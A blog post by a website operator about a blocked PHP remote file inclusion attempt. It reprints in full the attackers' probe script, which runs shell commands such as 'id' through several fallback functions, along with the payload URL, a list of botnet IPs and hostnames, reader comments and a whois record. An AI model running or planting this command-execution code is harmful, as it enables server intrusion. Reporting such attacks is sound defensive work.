Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.
The script they were trying to inject was located here:
http://www.doncapone.com.br/.,/n?Here's a copy of their PHP script for your viewing pleasure:
<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt');
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>
Here's a list of IP's with reverse DNS of the botnet involved with the attack so you can get an idea that any machine can be infected, it's pretty random:121.119.172.33
newsclip.be
134.76.41.1
saturn.roentgen.physik.uni-goettingen.de.
195.14.56.16
netgenic.pac.ru.
195.205.77.30
bsd.page.pl.
195.77.190.208
www.medinalaboral.com.
198.189.237.157
garnet.csumb.edu.
200.89.153.204
gw0fibertel.tenroses.com.ar.
203.146.127.143
mail.wisetair.com.
203.146.129.149
not found: 3(NXDOMAIN)
203.81.43.130
130.128.43.81.203.in-addr.arpa.
mx1.mail.cliqo.com.
204.8.46.250
eaglemedia.com.
207.176.224.189
207-176-224-189.static-ip.ravand.ca.
207.44.178.47
mail.tmanshost.com.
208.101.13.198
server-center.net.
209.61.181.243
server4.sulek.net.
210.48.156.42
dns7.kutu.net.
211.62.35.151
not found: 3(NXDOMAIN)
212.110.119.85
www05.makolan.net.
212.174.113.76
mail.tros.gen.tr.
212.39.26.44
web22.hostdeck.com.
213.190.51.202
ns1.laisvas.lt.
213.218.141.11
caracas15.ecritel.net.
221.143.48.237
221-143-48-237.tongkni.co.kr.
222.231.2.50
b50.nskorea.com.
62.4.100.2
host.mantlik.cz.
64.91.251.107
nexus.sourcedns.com.
66.11.122.105
service66.11.122-105.serverprovider.com.
66.55.78.16
66-55-78-16.yourhostingprovider.net.
70.130.237.252
;; connection timed out; no servers could be reached
74.50.13.48
deneb.lunarpages.com.
81.173.242.33
gate.eyepower.de.
81.255.205.81
mail.chaffenay.com.
82.116.79.30
reseller.sircon.net.
82.195.230.142
gdp-lin-230-142.as16215.net.
82.67.222.122
bdy93-1-82-67-222-122.fbx.proxad.net.
85.13.194.179
cherryco.marketing-internet.com.
86.125.92.68
6-125-92-68.brasov.rdsnet.ro.
Pretty random list of sites infected with this botnet from locations throughout the world.
The bot blocker shut down all these attempts but I wonder what they'll try next time?
4 comments:
What did the script do?
What kind of site was it?
The site was hacked, they weren't involved.
The script is a type of shell script, the entry way into the server, it's a probe.
I ran this search else { $xeQt="id"; }.
I'm very curious what OS those hacked boxes are running.
Google Wireless Transcoder being used in a hacking attempt.
Log File
- Request contained a malicious JavaScript or SQL injection attack
Header
- GET /node/4124#comment-501 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Encoding: gzip Accept-Language: en-us Cookie: PHPSESSID=554c98325f86ae95927204be27b834bc; bb2_screener_=1195063773+72.14.193.1+86.106.50.55 Host: www.xxx.com Referer: http://www.xxx.com/node/4124 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3) X-Forwarded-For: 86.106.50.55 X-moz: prefetch
IP Whois = 72.14.193.1 - - [20/May/2007:12:38:06 +0200] "GET /images/cs.gif HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)"
This is the hacker:
inetnum: 86.106.32.0 - 86.106.63.255
netname: SC-UPC-ROMANIA-SA
descr: SC UPC Romania SA
descr: str. Herastrau 17
descr: Bucuresti 1
country: ro
admin-c: AH1598-RIPE
tech-c: MA190-RIPE
status: ASSIGNED PA
remarks: Registered trough http://www.jump.ro/ip.html
mnt-by: RO-MNT
mnt-lower: RO-MNT
mnt-routes: ASTRALTELECOM-MNT
source: RIPE Filtered
person: Astral Telecom Hostmaster
address: Astral Telecom SA
address: ROMANIA
phone: 40 264 414688
fax-no: 40 264 414687
e-mail: hostmaster@astral.ro
I blocked 86.106.32.0/19 about 6 months ago and the garbage still got through.
Post a Comment